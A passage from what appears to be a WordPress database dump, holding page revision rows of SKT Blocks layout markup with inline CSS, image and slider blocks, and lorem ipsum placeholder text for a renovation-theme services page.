.block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-389d7fd7-5a95-4aae-84c6-df60c9ee0a8d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"d00f6e3f-2983-46ae-8e86-adf6eb45b88d\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d00f6e3f-2983-46ae-8e86-adf6eb45b88d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Insurance','','inherit','closed','closed','','226-revision-v1','','','2022-08-23 19:05:36','2022-08-23 19:05:36','',226,'https://cteisys.com/?p=461',0,'revision','',0),(344,1,'2021-05-27 10:52:48','2021-05-27 10:52:48','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ebd450c2-fa0b-4c48-a797-e737001ccee6\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-ebd450c2-fa0b-4c48-a797-e737001ccee6 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"06ef029a-8637-4395-a64b-483f5f811257\"} -->\n<style type=\"text/css\"> .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-06ef029a-8637-4395-a64b-483f5f811257 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"34c8452e-0e0d-4c6e-96ef-39c175a05300\"} -->\n<style type=\"text/css\"> .block-34c8452e-0e0d-4c6e-96ef-39c175a05300 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-34c8452e-0e0d-4c6e-96ef-39c175a05300 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-34c8452e-0e0d-4c6e-96ef-39c175a05300 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-34c8452e-0e0d-4c6e-96ef-39c175a05300 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-34c8452e-0e0d-4c6e-96ef-39c175a05300 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-34c8452e-0e0d-4c6e-96ef-39c175a05300\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"eb6de03a-74f8-4aef-92d8-b525be50346e\"} -->\n<style type=\"text/css\"> .block-eb6de03a-74f8-4aef-92d8-b525be50346e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-eb6de03a-74f8-4aef-92d8-b525be50346e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-eb6de03a-74f8-4aef-92d8-b525be50346e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-eb6de03a-74f8-4aef-92d8-b525be50346e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-eb6de03a-74f8-4aef-92d8-b525be50346e .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-eb6de03a-74f8-4aef-92d8-b525be50346e\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Fusce congue augue sollicitudin dignissim ultricies</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra eget vulputate ac, finiee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">bus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee semper lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero. Morbi rhoncus sem at ligula tempus varius. Cras erat ipsum, accpellentesque egestas a, condimen in ante. Quisque in felis quam. Cras at ultricie mi purus, viverra eget vulputate ac, finiee bus nec velit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a1ffc371-4c61-48a2-b162-a9b2e12f6fe6\"} -->\n<style type=\"text/css\"> .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"c65549f2-71d5-48aa-9a59-33412c5811e2\"} -->\n<style type=\"text/css\"> .block-c65549f2-71d5-48aa-9a59-33412c5811e2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-c65549f2-71d5-48aa-9a59-33412c5811e2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-c65549f2-71d5-48aa-9a59-33412c5811e2 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-c65549f2-71d5-48aa-9a59-33412c5811e2 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-c65549f2-71d5-48aa-9a59-33412c5811e2 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-c65549f2-71d5-48aa-9a59-33412c5811e2\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"175a3c84-3dfb-4d11-904d-78dafbac1c4b\"} -->\n<style type=\"text/css\"> .block-id-175a3c84-3dfb-4d11-904d-78dafbac1c4b .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-175a3c84-3dfb-4d11-904d-78dafbac1c4b .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-175a3c84-3dfb-4d11-904d-78dafbac1c4b .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-175a3c84-3dfb-4d11-904d-78dafbac1c4b is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":30} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"df1b904e-a10f-44aa-b563-c465d6e1668c\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-seperator 